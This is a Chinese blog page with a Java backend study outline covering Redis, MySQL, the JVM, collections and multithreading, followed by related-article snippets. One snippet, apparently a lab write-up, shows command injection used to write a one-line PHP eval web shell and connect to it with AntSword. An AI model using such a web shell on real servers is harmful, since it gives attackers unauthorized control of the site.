java开发中间件学习记录(持续更新中~)

news2024/11/22 21:39:41

1 Redis

2JVM

3 java基础底层

4Mysql

5 spring

6 微服务

7.......(持续更新)

One:Redis篇

1:Redis

1.穿透 

1.1缓存穿透

1.1.1布隆过滤器 

1.2缓存击穿 

2:击穿 

1.3:缓存雪崩 

1.4:双写一致  

1.5.持久化(RDB,AOF)

 1.6删除策略

1.7淘汰策略 

1.8分布式锁 (setnx,redisson)

1.9Redis集群 

1.9.1主从复制 

1.9.2哨兵(Sentinel )

1.9.2.1脑裂 

1.9.3分片集群 

1.10 (为什么Redis这么快)I/O多路复用模型 

2:MYSQL

2.1如何定位慢查询 

2.2什么是索引 (了解索引吗)

2.3什么是聚集索引(聚簇索引)二级索引(非聚簇索引)

2.3.1回表查询 

2.4覆盖索引 

2.5MYSQL超大分页处理 

2.6索引创建的原则 

2.7索引失效 

2.7.1最左前缀法则 

 2.7.2范围查询右边列失效

2.7.3在索引列上进行运输操作 

2.7.4以%开头的模糊匹配

2.8sql优化 

2.9事务的特性 (ACID)

2.10并发事物带来的问题(脏读,不可重复读,幻读) 

2.11undo log,redo log 区别

2.12MVCC(多版本并发控制) 

2.13MYSQL主从同步原理 

2.14分库分表 

3: JVM:

3.1JVM组成部分 ,运行流程

3.2程序计数器 

3.3介绍一下Java堆

3.4虚拟机栈

3.4.1栈溢出 

3.5解释一下方法区

3.5.1常量池 

3.5.2运行时常量池 

3.6听说过直接内存吗:

3.7什么是类加载器,类加载器有哪些

3.8什么是双亲委派模型

3.9类加载的执行过程 

3.10对象什么时候被垃圾器回收

3.10.1可达性分析算法 

3.11垃圾回收算法有哪些

3.12JVM的分代回收

3.13有哪些垃圾回收器:

3.14 G1垃圾回收器

3.15强引用,软引用,弱引用,虚引用区别

3.16JVM调优的参数在哪里设置参数值

3.17JVM调优参数有哪些

3.18JVM调优工具

3.19java内存泄漏排查思路

3.20CPU飙高排查 

4:常见集合篇:

4.1List

4.1.1数字索引从0开始为什么

4.2ArrayList底层实现原理

4.3Arraylist扩容

4.4数字和list转换

4.5ArrayList和LinkedList的区别

4.6HashMap 

4.6.1红黑树 

4.6.2散列表 

4.7哈希冲突 

4.8HashMap的实现原理 

4.9HashMap的put方法具体流程

4.10HashMap的扩容机制

4.11hashMap的寻址公式

4.12hashmap多线程死循环

5:多线程:

5.1线程和进程的区别 

 5.2并行和并发的区别

5.3创建线程的方式

5.4runnable和callable(创建线程时) 的区别

5.5线程 run()和start()的区别

5.6线程包括那些状态(之间是如何转换的)

5.7多个线程之间的执行顺序

5.8 notify()和notifyAll()的区别

9:wait()和sleep()的区别

5.10如何停止一个运行的线程

2:

3:

5.11synchronized关键字的底层原理

5.12 锁升级

2:

5.13java内存模型

5.14CAS你知道吗

5.15volatile的理解 

简单说就是JVM为了对代码进行优化提高性能会在不影响结果的情况下把代码执行顺序改变,但多线程就可能会出现结果不对的问题

然后volatile原理就是加了一些屏障,使屏障后的代码一定不会比屏障前的代码先执行,从而实现有序性

5.16什么是AQS 

5.17ReentrantLock的实现原理 

5.18死锁产生的条件 

​​​​​​6:框架篇(spring( boot,mvc),mybatis)

7微服务:

8:消息中间件(MQ,Kafka)

9 设计模式

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2134963.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

80V降24V2A同步降压WT6037

80V降24V2A同步降压WT6037 WT6037是一款适用于36V-80V输入电压范围,输出24V2A电流的同步降压恒压芯片。该芯片具有宽输入电压范围,高转换效率,低静态电流消耗等特点,可广泛应用于电池组系统,电动自行车,电动…

SD-WAN网络如何实现双向访问?

在SD-WAN架构中,双向访问是一个重要的概念,它允许网络流量在不同方向上流动,从分支机构到数据中心或云端,再从数据中心或云端返回分支机构。本文将详细探讨SD-WAN如何实现双向访问,并解释其背后的工作原理。 什么是双向…

对话世优科技CEO纪智辉:AI模型让数字人发展按下加速键

2024年9月12日,中国国际服务贸易交易会全球服务贸易峰会在北京举行,世优科技作为深耕虚拟数字人领域的科技企业,聚焦“新而专”,连续两届参加服贸会。2024年,世优科技以合作供应商身份参与本届服贸会。 在AI的大浪潮下…

Jetpack Compose Side Effects in Details 副作用的详细信息

What is Side Effect’s? 副作用是什么? Side Effects is a change in the state of the application that occurs outside the scope of the composable function and is not related to the UI. In non-UI related state changes, our screen may recompose mor…

一、机器学习算法与实践_02KNN算法笔记

1、KNN基本介绍 1.1 定义 KNN(K-NearestNeighbor,即:K最邻近算法)是一种基于实例的学习方法,用于分类和回归任务,它通过查找一个数据点的最近邻居来预测该数据点的标签或数值。 所谓K最近邻,…

性能测试-性能分析与调优原理总结

性能分析与调优如何下手,先从硬件开始,还是先从代码或数据库。 从操作系统(CPU调度,内存管理,进程调度,磁盘I/O)、网络、协议(HTTP, TCP/IP ),还是…

Elasticsearch基础(七):Logstash如何开启死信队列

文章目录 Logstash如何开启死信队列 一、确保 Elasticsearch 输出插件启用 DLQ 支持 二、配置 Logstash DLQ 设置 三、查看死信队列 四、排查 CSV 到 Elasticsearch 数据量不一致的问题 Logstash如何开启死信队列 在 Logstash 中,死信队列(Dead Le…

【Elasticsearch系列二】安装 Kibana

💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…

seafaring寻找漏洞

一.命令执行漏洞 &#xff08;1&#xff09;下面有一个输入框&#xff0c;输入ls进行查看 &#xff08;2&#xff09;输入echo <?php phpinfo();?> > qxl.php 并且访问 (3)写入一句话木马&#xff0c;并且访问蚁剑连接 echo <?php eval($_POST[cmd];?>>…

1T机械硬盘需要分区吗?你必须知道的分区知识

随着科技的不断发展&#xff0c;计算机存储设备的容量日益增大&#xff0c;1T(1TB&#xff0c;即1024GB)机械硬盘已成为许多电脑用户的标配。然而&#xff0c;在这样一个大容量硬盘面前&#xff0c;很多用户都会面临一个问题&#xff1a;是否需要对这块硬盘进行分区&#xff1f…

electron有关mac构建

针对 Mac M1/2/3 芯片的设备&#xff0c;proces.archarm64. 执行下面命令&#xff0c;检查下按照的 node.js 版本是不是 intel x64 指令集&#xff0c;如果是的话安装下 arm64 指令集的 node.js终端中执行以下命令&#xff1a;node -p process.arch 对应的node版本也是arm版 …

启明星辰防火墙结合宁盾双因素认证方案

防火墙是企业网络安全的第一道防线。近年来网络设备、安全设备的特权账号成为不法分子恶意攻击的首要目标&#xff0c;因此加强对防火墙登录&#xff08;特权账号&#xff09;身份鉴别十分重要。以启明星辰天清汉马USG防火墙为例&#xff0c;结合宁盾双因素认证&#xff0c;为特…

【C++】————IO流

作者主页&#xff1a; 作​​​​​​者主页 本篇博客专栏&#xff1a;C 创作时间 &#xff1a;2024年9月9日 一、C语言的输入和输出 C语言中我们用到的最频繁的输入输出方式就是 scanf() 和 printf()。 scanf()&#xff1a;从标准输入设备&#xff08;键盘&#xff09;读…

图像滤波---各项异性扩散滤波使用笔记及代码

图像滤波---各项异性扩散滤波使用笔记及代码 一、文章内容介绍二、各项异性扩散滤波和各项同性滤波1、各项同性滤波2、各项异性扩散滤波3、各项异性和各项同性的对比 三、各项异性扩散滤波的原理介绍四、各项异性扩散滤波公式五、公式中的参数使用说明1、扩散速率 λ \lambda λ…

关键错误 你的开始菜单出现了问题 我们将尝试在你下一次登录时修复它。【笔记】

使用场景设备为Windows11系统&#xff0c;处理提示“关键错误 你的开始菜单出现了问题 我们将尝试在你下一次登录时修复它。”方法之一 处理步骤如下&#xff1a; 1、打开【设置】→【Windows更新】→【高级选项】。 2、切换界面选择【恢复】。 3、选择【使用Windows更新…

redhat目录结构详解

1、/&#xff1a; 根目录 2、/bin&#xff1a; 二进制文件&#xff0c;即命令&#xff0c;即linux的用户命令放在/bin目录中。 3、/boot&#xff1a; 跟启动相关的文件&#xff0c;比如内核都放在/boot目录中。 4、/dev&#xff1a; 内存中的目录&#xff0c;关…

基于Spark框架实现XGBoost模型

基于Spark框架实现XGBoost模型 原生的Spark MLlib并不支持XGBoost算法&#xff0c;但XGBoost4J-Spark提供了一种解决方案&#xff0c;使得我们可以在Spark环境中调用XGBoost。XGBoost4J-Spark是一个项目&#xff0c;旨在无缝集成XGBoost和Apache Spark&#xff0c;通过适配XGB…

为什么是删除缓存,而不是更新缓存?

一、事情起因 一般来说数据库与缓存一致性的方案大致有以下几种&#xff1a; 其中Cache-Aside Pattern&#xff0c;也被称为旁路缓存模式应该是使用的比较广泛 Cache-Aside Pattern&#xff0c;也被称为旁路缓存模式&#xff0c;是一种常见的缓存设计模式&#xff0c;其中缓存…

和鲸科技聘任上海交通大学医学院张维拓老师为公司医学行业专家顾问

2024 年 9 月 13 日&#xff0c;上海和今信息科技有限公司&#xff08;以下简称“和鲸科技”&#xff09;举行了聘任仪式&#xff0c;聘请上海交通大学医学院临床研究中心副研究员张维拓老师为和鲸科技医学行业专家顾问&#xff0c;共同为医疗相关机构及相关院校提供完整的高质…

VMware软件下载,VMware虚拟机软件下载安装,VMware功能介绍

VMware是一款虚拟化软件&#xff0c;它具有许多独特的功能&#xff0c;可以帮助用户更好地管理和使用计算机资源。在本文中&#xff0c;我将介绍VMware软件的三个独特功能&#xff0c;并结合实际案例进行详细说明。 虚拟硬件 VMware最新中文版获取&#xff1a; hairuanku.top…